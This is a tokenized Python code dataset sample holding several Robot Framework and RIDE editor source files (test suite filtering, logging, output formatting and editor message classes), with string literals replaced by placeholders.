BoxSizer ( ) <EOL> display = TagsDisplay ( frame , None ) <EOL> display . add_tag ( ForcedTag ( '<STR_LIT>' ) , False ) <EOL> display . add_tag ( DefaultTag ( '<STR_LIT:default>' ) , False ) <EOL> for name in [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> display . add_tag ( Tag ( name ) , True ) <EOL> display . add_tag ( Tag ( '<STR_LIT>' ) , False ) <EOL> display . build ( ) <EOL> sz . Add ( display , <NUM_LIT:0> , wx . GROW | wx . ALL , <NUM_LIT:5> ) <EOL> frame . Show ( True ) <EOL> self . SetTopWindow ( frame ) <EOL> return True <EOL> app = MyMenuApp ( <NUM_LIT:0> ) <EOL> app . MainLoop ( ) </s>
<s> import os <EOL> class LibdocOutput ( object ) : <EOL> def __init__ ( self , output_path , format ) : <EOL> self . _output_path = output_path <EOL> self . _format = format . upper ( ) <EOL> self . _output_file = None <EOL> def __enter__ ( self ) : <EOL> if self . _format == '<STR_LIT>' : <EOL> self . _output_file = open ( self . _output_path , '<STR_LIT:w>' ) <EOL> return self . _output_file <EOL> return self . _output_path <EOL> def __exit__ ( self , * exc_info ) : <EOL> if self . _output_file : <EOL> self . _output_file . close ( ) <EOL> if any ( exc_info ) : <EOL> os . remove ( self . _output_path ) </s>
<s> from robotide . lib . robot . utils import setter <EOL> from . tags import TagPatterns <EOL> from . namepatterns import SuiteNamePatterns , TestNamePatterns <EOL> from . visitor import SuiteVisitor <EOL> class EmptySuiteRemover ( SuiteVisitor ) : <EOL> def end_suite ( self , suite ) : <EOL> suite . suites = [ s for s in suite . suites if s . test_count ] <EOL> def visit_test ( self , test ) : <EOL> pass <EOL> def visit_keyword ( self , kw ) : <EOL> pass <EOL> class Filter ( EmptySuiteRemover ) : <EOL> def __init__ ( self , include_suites = None , include_tests = None , <EOL> include_tags = None , exclude_tags = None ) : <EOL> self . include_suites = include_suites <EOL> self . include_tests = include_tests <EOL> self . include_tags = include_tags <EOL> self . exclude_tags = exclude_tags <EOL> @ setter <EOL> def include_suites ( self , suites ) : <EOL> return SuiteNamePatterns ( suites ) if not isinstance ( suites , SuiteNamePatterns ) else suites <EOL> @ setter <EOL> def include_tests ( self , tests ) : <EOL> return TestNamePatterns ( tests ) if not isinstance ( tests , TestNamePatterns ) else tests <EOL> @ setter <EOL> def include_tags ( self , tags ) : <EOL> return TagPatterns ( tags ) if not isinstance ( tags , TagPatterns ) else tags <EOL> @ setter <EOL> def exclude_tags ( self , tags ) : <EOL> return TagPatterns ( tags ) if not isinstance ( tags , TagPatterns ) else tags <EOL> def start_suite ( self , suite ) : <EOL> if not self : <EOL> return False <EOL> if hasattr ( suite , '<STR_LIT>' ) : <EOL> suite . starttime = suite . endtime = None <EOL> if self . include_suites : <EOL> return self . _filter_by_suite_name ( suite ) <EOL> if self . include_tests : <EOL> suite . tests = self . _filter ( suite , self . _included_by_test_name ) <EOL> if self . include_tags : <EOL> suite . tests = self . _filter ( suite , self . _included_by_tags ) <EOL> if self . exclude_tags : <EOL> suite . tests = self . _filter ( suite , self . 
_not_excluded_by_tags ) <EOL> return bool ( suite . suites ) <EOL> def _filter_by_suite_name ( self , suite ) : <EOL> if self . include_suites . match ( suite . name , suite . longname ) : <EOL> suite . visit ( Filter ( include_suites = [ ] , <EOL> include_tests = self . include_tests , <EOL> include_tags = self . include_tags , <EOL> exclude_tags = self . exclude_tags ) ) <EOL> return False <EOL> suite . tests = [ ] <EOL> return True <EOL> def _filter ( self , suite , filter ) : <EOL> return [ t for t in suite . tests if filter ( t ) ] <EOL> def _included_by_test_name ( self , test ) : <EOL> return self . include_tests . match ( test . name , test . longname ) <EOL> def _included_by_tags ( self , test ) : <EOL> return self . include_tags . match ( test . tags ) <EOL> def _not_excluded_by_tags ( self , test ) : <EOL> return not self . exclude_tags . match ( test . tags ) <EOL> def __nonzero__ ( self ) : <EOL> return bool ( self . include_suites or self . include_tests or <EOL> self . include_tags or self . exclude_tags ) </s>
<s> from robotide . lib . robot . errors import DataError <EOL> from . loggerhelper import AbstractLogger <EOL> class FileLogger ( AbstractLogger ) : <EOL> def __init__ ( self , path , level ) : <EOL> AbstractLogger . __init__ ( self , level ) <EOL> self . _writer = self . _get_writer ( path ) <EOL> def _get_writer ( self , path ) : <EOL> try : <EOL> return open ( path , '<STR_LIT:w>' ) <EOL> except EnvironmentError as err : <EOL> raise DataError ( err . strerror ) <EOL> def message ( self , msg ) : <EOL> if self . _is_logged ( msg . level ) and not self . _writer . closed : <EOL> entry = '<STR_LIT>' % ( msg . timestamp , msg . level . ljust ( <NUM_LIT:5> ) , <EOL> msg . message ) <EOL> self . _writer . write ( entry . encode ( '<STR_LIT>' ) ) <EOL> def start_suite ( self , suite ) : <EOL> self . info ( "<STR_LIT>" % suite . name ) <EOL> def end_suite ( self , suite ) : <EOL> self . info ( "<STR_LIT>" % suite . name ) <EOL> def start_test ( self , test ) : <EOL> self . info ( "<STR_LIT>" % test . name ) <EOL> def end_test ( self , test ) : <EOL> self . info ( "<STR_LIT>" % test . name ) <EOL> def start_keyword ( self , kw ) : <EOL> self . debug ( lambda : "<STR_LIT>" % kw . name ) <EOL> def end_keyword ( self , kw ) : <EOL> self . debug ( lambda : "<STR_LIT>" % kw . name ) <EOL> def output_file ( self , name , path ) : <EOL> self . info ( '<STR_LIT>' % ( name , path ) ) <EOL> def close ( self ) : <EOL> self . _writer . close ( ) </s>
<s> from robotide . lib . robot . output import LEVELS <EOL> from . jsbuildingcontext import JsBuildingContext <EOL> from . jsexecutionresult import JsExecutionResult <EOL> class JsModelBuilder ( object ) : <EOL> def __init__ ( self , log_path = None , split_log = False , <EOL> prune_input_to_save_memory = False ) : <EOL> self . _context = JsBuildingContext ( log_path , split_log , <EOL> prune_input_to_save_memory ) <EOL> def build_from ( self , result_from_xml ) : <EOL> return JsExecutionResult ( <EOL> statistics = StatisticsBuilder ( ) . build ( result_from_xml . statistics ) , <EOL> suite = SuiteBuilder ( self . _context ) . build ( result_from_xml . suite ) , <EOL> errors = ErrorsBuilder ( self . _context ) . build ( result_from_xml . errors ) , <EOL> strings = self . _context . strings , <EOL> basemillis = self . _context . basemillis , <EOL> split_results = self . _context . split_results , <EOL> min_level = self . _context . min_level <EOL> ) <EOL> class _Builder ( object ) : <EOL> _statuses = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> } <EOL> def __init__ ( self , context ) : <EOL> self . _context = context <EOL> self . _string = self . _context . string <EOL> self . _html = self . _context . html <EOL> self . _timestamp = self . _context . timestamp <EOL> def _get_status ( self , item ) : <EOL> model = ( self . _statuses [ item . status ] , <EOL> self . _timestamp ( item . starttime ) , <EOL> item . elapsedtime ) <EOL> msg = getattr ( item , '<STR_LIT:message>' , '<STR_LIT>' ) <EOL> if not msg : <EOL> return model <EOL> elif msg . startswith ( '<STR_LIT>' ) : <EOL> msg = self . _string ( msg [ <NUM_LIT:6> : ] . lstrip ( ) , escape = False ) <EOL> else : <EOL> msg = self . _string ( msg ) <EOL> return model + ( msg , ) <EOL> def _build_keywords ( self , kws , split = False ) : <EOL> splitting = self . _context . start_splitting_if_needed ( split ) <EOL> model = tuple ( self . 
_build_keyword ( k ) for k in kws ) <EOL> return model if not splitting else self . _context . end_splitting ( model ) <EOL> class SuiteBuilder ( _Builder ) : <EOL> def __init__ ( self , context ) : <EOL> _Builder . __init__ ( self , context ) <EOL> self . _build_suite = self . build <EOL> self . _build_test = TestBuilder ( context ) . build <EOL> self . _build_keyword = KeywordBuilder ( context ) . build <EOL> def build ( self , suite ) : <EOL> with self . _context . prune_input ( suite . suites , suite . tests , suite . keywords ) : <EOL> stats = self . _get_statistics ( suite ) <EOL> return ( self . _string ( suite . name , attr = True ) , <EOL> self . _string ( suite . source ) , <EOL> self . _context . relative_source ( suite . source ) , <EOL> self . _html ( suite . doc ) , <EOL> tuple ( self . _yield_metadata ( suite ) ) , <EOL> self . _get_status ( suite ) , <EOL> tuple ( self . _build_suite ( s ) for s in suite . suites ) , <EOL> tuple ( self . _build_test ( t ) for t in suite . tests ) , <EOL> tuple ( self . _build_keyword ( k , split = True ) for k in suite . keywords ) , <EOL> stats ) <EOL> def _yield_metadata ( self , suite ) : <EOL> for name , value in suite . metadata . iteritems ( ) : <EOL> yield self . _string ( name ) <EOL> yield self . _html ( value ) <EOL> def _get_statistics ( self , suite ) : <EOL> stats = suite . statistics <EOL> return ( stats . all . total , <EOL> stats . all . passed , <EOL> stats . critical . total , <EOL> stats . critical . passed ) <EOL> class TestBuilder ( _Builder ) : <EOL> def __init__ ( self , context ) : <EOL> _Builder . __init__ ( self , context ) <EOL> self . _build_keyword = KeywordBuilder ( context ) . build <EOL> def build ( self , test ) : <EOL> with self . _context . prune_input ( test . keywords ) : <EOL> return ( self . _string ( test . name , attr = True ) , <EOL> self . _string ( test . timeout ) , <EOL> int ( test . critical ) , <EOL> self . _html ( test . doc ) , <EOL> tuple ( self . 
_string ( t ) for t in test . tags ) , <EOL> self . _get_status ( test ) , <EOL> self . _build_keywords ( test . keywords , split = True ) ) <EOL> class KeywordBuilder ( _Builder ) : <EOL> _types = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:4> } <EOL> def __init__ ( self , context ) : <EOL> _Builder . __init__ ( self , context ) <EOL> self . _build_keyword = self . build <EOL> self . _build_message = MessageBuilder ( context ) . build <EOL> def build ( self , kw , split = False ) : <EOL> with self . _context . prune_input ( kw . messages , kw . keywords ) : <EOL> return ( self . _types [ kw . type ] , <EOL> self . _string ( kw . kwname , attr = True ) , <EOL> self . _string ( kw . libname , attr = True ) , <EOL> self . _string ( kw . timeout ) , <EOL> self . _html ( kw . doc ) , <EOL> self . _string ( '<STR_LIT:U+002CU+0020>' . join ( kw . args ) ) , <EOL> self . _string ( '<STR_LIT:U+002CU+0020>' . join ( kw . assign ) ) , <EOL> self . _string ( '<STR_LIT:U+002CU+0020>' . join ( kw . tags ) ) , <EOL> self . _get_status ( kw ) , <EOL> self . _build_keywords ( kw . keywords , split ) , <EOL> tuple ( self . _build_message ( m ) for m in kw . messages ) ) <EOL> class MessageBuilder ( _Builder ) : <EOL> def build ( self , msg ) : <EOL> if msg . level in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _context . create_link_target ( msg ) <EOL> self . _context . message_level ( msg . level ) <EOL> return self . _build ( msg ) <EOL> def _build ( self , msg ) : <EOL> return ( self . _timestamp ( msg . timestamp ) , <EOL> LEVELS [ msg . level ] , <EOL> self . _string ( msg . html_message , escape = False ) ) <EOL> class StatisticsBuilder ( object ) : <EOL> def build ( self , statistics ) : <EOL> return ( self . _build_stats ( statistics . total ) , <EOL> self . _build_stats ( statistics . tags ) , <EOL> self . _build_stats ( statistics . 
suite ) ) <EOL> def _build_stats ( self , stats ) : <EOL> return tuple ( stat . get_attributes ( include_label = True , include_elapsed = True , <EOL> exclude_empty = True , html_escape = True ) <EOL> for stat in stats ) <EOL> class ErrorsBuilder ( _Builder ) : <EOL> def __init__ ( self , context ) : <EOL> _Builder . __init__ ( self , context ) <EOL> self . _build_message = ErrorMessageBuilder ( context ) . build <EOL> def build ( self , errors ) : <EOL> with self . _context . prune_input ( errors . messages ) : <EOL> return tuple ( self . _build_message ( msg ) for msg in errors ) <EOL> class ErrorMessageBuilder ( MessageBuilder ) : <EOL> def build ( self , msg ) : <EOL> model = self . _build ( msg ) <EOL> link = self . _context . link ( msg ) <EOL> return model if link is None else model + ( link , ) </s>
<s> from robotide . lib . robot . errors import DataError <EOL> from robotide . lib . robot . utils import DotDict <EOL> class ArgumentMapper ( object ) : <EOL> def __init__ ( self , argspec ) : <EOL> self . _argspec = argspec <EOL> def map ( self , positional , named , variables = None , prune_trailing_defaults = False ) : <EOL> template = KeywordCallTemplate ( self . _argspec , variables ) <EOL> template . fill_positional ( positional ) <EOL> template . fill_named ( named ) <EOL> if prune_trailing_defaults : <EOL> template . prune_trailing_defaults ( ) <EOL> template . fill_defaults ( ) <EOL> return template . args , template . kwargs <EOL> class KeywordCallTemplate ( object ) : <EOL> def __init__ ( self , argspec , variables ) : <EOL> defaults = argspec . defaults <EOL> if variables : <EOL> defaults = variables . replace_list ( defaults ) <EOL> self . _positional = argspec . positional <EOL> self . _supports_kwargs = bool ( argspec . kwargs ) <EOL> self . _supports_named = argspec . supports_named <EOL> self . args = [ None ] * argspec . minargs + [ Default ( d ) for d in defaults ] <EOL> self . kwargs = DotDict ( ) <EOL> def fill_positional ( self , positional ) : <EOL> self . args [ : len ( positional ) ] = positional <EOL> def fill_named ( self , named ) : <EOL> for name , value in named . items ( ) : <EOL> if name in self . _positional and self . _supports_named : <EOL> index = self . _positional . index ( name ) <EOL> self . args [ index ] = value <EOL> elif self . _supports_kwargs : <EOL> self . kwargs [ name ] = value <EOL> else : <EOL> raise DataError ( "<STR_LIT>" % name ) <EOL> def prune_trailing_defaults ( self ) : <EOL> while self . args and isinstance ( self . args [ - <NUM_LIT:1> ] , Default ) : <EOL> self . args . pop ( ) <EOL> def fill_defaults ( self ) : <EOL> self . args = [ arg if not isinstance ( arg , Default ) else arg . value <EOL> for arg in self . args ] <EOL> class Default ( object ) : <EOL> def __init__ ( self , value ) : <EOL> self . 
value = value </s>
<s> from signal import setitimer , signal , SIGALRM , ITIMER_REAL <EOL> from robotide . lib . robot . errors import TimeoutError <EOL> class Timeout ( object ) : <EOL> def __init__ ( self , timeout , error ) : <EOL> self . _timeout = timeout <EOL> self . _error = error <EOL> def execute ( self , runnable ) : <EOL> self . _start_timer ( ) <EOL> try : <EOL> return runnable ( ) <EOL> finally : <EOL> self . _stop_timer ( ) <EOL> def _start_timer ( self ) : <EOL> signal ( SIGALRM , self . _raise_timeout_error ) <EOL> setitimer ( ITIMER_REAL , self . _timeout ) <EOL> def _raise_timeout_error ( self , signum , frame ) : <EOL> raise TimeoutError ( self . _error ) <EOL> def _stop_timer ( self ) : <EOL> setitimer ( ITIMER_REAL , <NUM_LIT:0> ) </s>
<s> import os <EOL> from . encoding import decode_from_system as decode , encode_to_system as encode <EOL> def get_env_var ( name , default = None ) : <EOL> try : <EOL> value = os . environ [ encode ( name ) ] <EOL> except KeyError : <EOL> return default <EOL> else : <EOL> return decode ( value ) <EOL> def set_env_var ( name , value ) : <EOL> os . environ [ encode ( name ) ] = encode ( value ) <EOL> def del_env_var ( name ) : <EOL> value = get_env_var ( name ) <EOL> if value is not None : <EOL> del os . environ [ encode ( name ) ] <EOL> return value <EOL> def get_env_vars ( upper = os . sep != '<STR_LIT:/>' ) : <EOL> return dict ( ( name if not upper else name . upper ( ) , get_env_var ( name ) ) <EOL> for name in ( decode ( name ) for name in os . environ ) ) </s>
<s> import re <EOL> from . aligners import FirstColumnAligner , ColumnAligner , NullAligner <EOL> from . dataextractor import DataExtractor <EOL> from . rowsplitter import RowSplitter <EOL> class _DataFileFormatter ( object ) : <EOL> _whitespace = re . compile ( '<STR_LIT>' ) <EOL> _split_multiline_doc = True <EOL> def __init__ ( self , column_count ) : <EOL> self . _splitter = RowSplitter ( column_count , self . _split_multiline_doc ) <EOL> self . _column_count = column_count <EOL> self . _extractor = DataExtractor ( self . _want_names_on_first_content_row ) <EOL> def _want_names_on_first_content_row ( self , table , name ) : <EOL> return True <EOL> def empty_row_after ( self , table ) : <EOL> return self . _format_row ( [ ] , table ) <EOL> def format_header ( self , table ) : <EOL> header = self . _format_row ( table . header ) <EOL> return self . _format_header ( header , table ) <EOL> def format_table ( self , table ) : <EOL> rows = self . _extractor . rows_from_table ( table ) <EOL> if self . _should_split_rows ( table ) : <EOL> rows = self . _split_rows ( rows , table ) <EOL> return ( self . _format_row ( r , table ) for r in rows ) <EOL> def _should_split_rows ( self , table ) : <EOL> return not self . _should_align_columns ( table ) <EOL> def _split_rows ( self , original_rows , table ) : <EOL> for original in original_rows : <EOL> for split in self . _splitter . split ( original , table . type ) : <EOL> yield split <EOL> def _should_align_columns ( self , table ) : <EOL> return self . _is_indented_table ( table ) and bool ( table . header [ <NUM_LIT:1> : ] ) <EOL> def _is_indented_table ( self , table ) : <EOL> return table is not None and table . type in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def _escape_consecutive_whitespace ( self , row ) : <EOL> return [ self . _whitespace . sub ( self . _whitespace_escaper , <EOL> cell . 
replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) ) for cell in row ] <EOL> def _whitespace_escaper ( self , match ) : <EOL> return '<STR_LIT:\\>' . join ( match . group ( <NUM_LIT:0> ) ) <EOL> def _format_row ( self , row , table = None ) : <EOL> raise NotImplementedError <EOL> def _format_header ( self , header , table ) : <EOL> raise NotImplementedError <EOL> class TsvFormatter ( _DataFileFormatter ) : <EOL> def _format_header ( self , header , table ) : <EOL> return [ self . _format_header_cell ( cell ) for cell in header ] <EOL> def _format_header_cell ( self , cell ) : <EOL> return '<STR_LIT>' % cell if cell else '<STR_LIT>' <EOL> def _format_row ( self , row , table = None ) : <EOL> return self . _pad ( self . _escape ( row ) ) <EOL> def _escape ( self , row ) : <EOL> return self . _escape_consecutive_whitespace ( self . _escape_tabs ( row ) ) <EOL> def _escape_tabs ( self , row ) : <EOL> return [ c . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) for c in row ] <EOL> def _pad ( self , row ) : <EOL> row = [ cell . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) for cell in row ] <EOL> return row + [ '<STR_LIT>' ] * ( self . _column_count - len ( row ) ) <EOL> class TxtFormatter ( _DataFileFormatter ) : <EOL> _test_or_keyword_name_width = <NUM_LIT> <EOL> _setting_and_variable_name_width = <NUM_LIT> <EOL> def _format_row ( self , row , table = None ) : <EOL> row = self . _escape ( row ) <EOL> aligner = self . _aligner_for ( table ) <EOL> return aligner . align_row ( row ) <EOL> def _aligner_for ( self , table ) : <EOL> if table and table . type in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return FirstColumnAligner ( self . _setting_and_variable_name_width ) <EOL> if self . _should_align_columns ( table ) : <EOL> return ColumnAligner ( self . _test_or_keyword_name_width , table ) <EOL> return NullAligner ( ) <EOL> def _format_header ( self , header , table ) : <EOL> header = [ '<STR_LIT>' % header [ <NUM_LIT:0> ] ] + header [ <NUM_LIT:1> : ] <EOL> aligner = self . 
_aligner_for ( table ) <EOL> return aligner . align_row ( header ) <EOL> def _want_names_on_first_content_row ( self , table , name ) : <EOL> return self . _should_align_columns ( table ) and len ( name ) <= self . _test_or_keyword_name_width <EOL> def _escape ( self , row ) : <EOL> if not row : <EOL> return row <EOL> return self . _escape_cells ( self . _escape_consecutive_whitespace ( row ) ) <EOL> def _escape_cells ( self , row ) : <EOL> return [ row [ <NUM_LIT:0> ] ] + [ self . _escape_empty ( cell ) for cell in row [ <NUM_LIT:1> : ] ] <EOL> def _escape_empty ( self , cell ) : <EOL> return cell or '<STR_LIT:\\>' <EOL> class PipeFormatter ( TxtFormatter ) : <EOL> def _escape_cells ( self , row ) : <EOL> return [ self . _escape_empty ( self . _escape_pipes ( cell ) ) for cell in row ] <EOL> def _escape_empty ( self , cell ) : <EOL> return cell or '<STR_LIT:U+0020>' <EOL> def _escape_pipes ( self , cell ) : <EOL> if '<STR_LIT>' in cell : <EOL> cell = cell . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if cell . startswith ( '<STR_LIT>' ) : <EOL> cell = '<STR_LIT:\\>' + cell <EOL> if cell . endswith ( '<STR_LIT>' ) : <EOL> cell = cell [ : - <NUM_LIT:1> ] + '<STR_LIT>' <EOL> return cell </s>
<s> import inspect <EOL> import sys <EOL> import traceback <EOL> from robotide import utils <EOL> from . import messagetype <EOL> from . import publisher <EOL> class RideMessage ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = messagetype . messagetype <EOL> topic = None <EOL> data = [ ] <EOL> def __init__ ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if sorted ( kwargs . keys ( ) ) != sorted ( self . data ) : <EOL> raise TypeError ( '<STR_LIT>' % self . data ) <EOL> self . __dict__ . update ( kwargs ) <EOL> def publish ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . _publish ( self ) <EOL> except Exception , err : <EOL> self . _publish ( RideLogException ( message = '<STR_LIT>' + str ( err ) , <EOL> exception = err , level = '<STR_LIT>' ) ) <EOL> def _publish ( self , msg ) : <EOL> publisher . PUBLISHER . publish ( msg . topic , msg ) <EOL> class RideLog ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideLogMessage ( RideLog ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , message , level = '<STR_LIT>' , notify_user = False ) : <EOL> """<STR_LIT>""" <EOL> RideMessage . __init__ ( <EOL> self , message = message , level = level , <EOL> timestamp = utils . get_timestamp ( ) , notify_user = notify_user ) <EOL> class RideLogException ( RideLog ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , message , exception , level = '<STR_LIT>' , notify_user = False ) : <EOL> """<STR_LIT>""" <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> if exc_traceback : <EOL> tb = traceback . extract_tb ( exc_traceback ) <EOL> message += '<STR_LIT>' % ( unicode ( exception ) , '<STR_LIT>' . join ( traceback . format_list ( tb ) ) ) <EOL> RideMessage . 
__init__ ( <EOL> self , message = message , level = level , notify_user = False , <EOL> timestamp = utils . get_timestamp ( ) , exception = exception ) <EOL> class RideInputValidationError ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:message>' ] <EOL> class RideModificationPrevented ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideSettingsChanged ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideExecuteSpecXmlImport ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> class RideTreeSelection ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideOpenVariableDialog ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestExecutionStarted ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestSelectedForRunningChanged ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestRunning ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestPassed ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestFailed ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideNotebookTabChanging ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideNotebookTabChanged ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> class RideSaving ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideSaved ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' ] <EOL> class RideSaveAll ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> class RideDataDirtyCleared ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideNewProject ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' 
] <EOL> class RideClosing ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RideOpenSuite ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideOpenResource ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideSelectResource ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideDataChanged ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> class RideFileNameChanged ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideDataFileRemoved ( RideDataChanged ) : <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideSuiteAdded ( RideDataChanged ) : <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideInitFileRemoved ( RideDataChanged ) : <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideImportSetting ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' ] <EOL> def is_resource ( self ) : <EOL> return self . type == '<STR_LIT>' <EOL> @ property <EOL> def name ( self ) : <EOL> return self . import_controller . 
name <EOL> class _RideExcludes ( RideMessage ) : <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideIncludesChanged ( _RideExcludes ) : <EOL> pass <EOL> class RideExcludesChanged ( _RideExcludes ) : <EOL> pass <EOL> class RideImportSettingAdded ( RideImportSetting ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RideImportSettingChanged ( RideImportSetting ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RideImportSettingRemoved ( RideImportSetting ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RideDataChangedToDirty ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideDataFileSet ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideUserKeyword ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> class RideUserKeywordAdded ( RideUserKeyword ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideUserKeywordRemoved ( RideUserKeyword ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideItem ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideItemStepsChanged ( RideItem ) : <EOL> """<STR_LIT>""" <EOL> class RideItemNameChanged ( RideItem ) : <EOL> """<STR_LIT>""" <EOL> class RideItemSettingsChanged ( RideItem ) : <EOL> """<STR_LIT>""" <EOL> class RideTestCaseAdded ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideTestCaseRemoved ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideItemMovedUp ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideItemMovedDown ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideVariableAdded ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:index>' ] 
<EOL> class RideVariableRemoved ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideVariableMovedUp ( RideItemMovedUp ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideVariableMovedDown ( RideItemMovedDown ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideVariableUpdated ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideOpenTagSearch ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> __all__ = [ name for name , cls in globals ( ) . items ( ) <EOL> if inspect . isclass ( cls ) and issubclass ( cls , RideMessage ) ] </s>
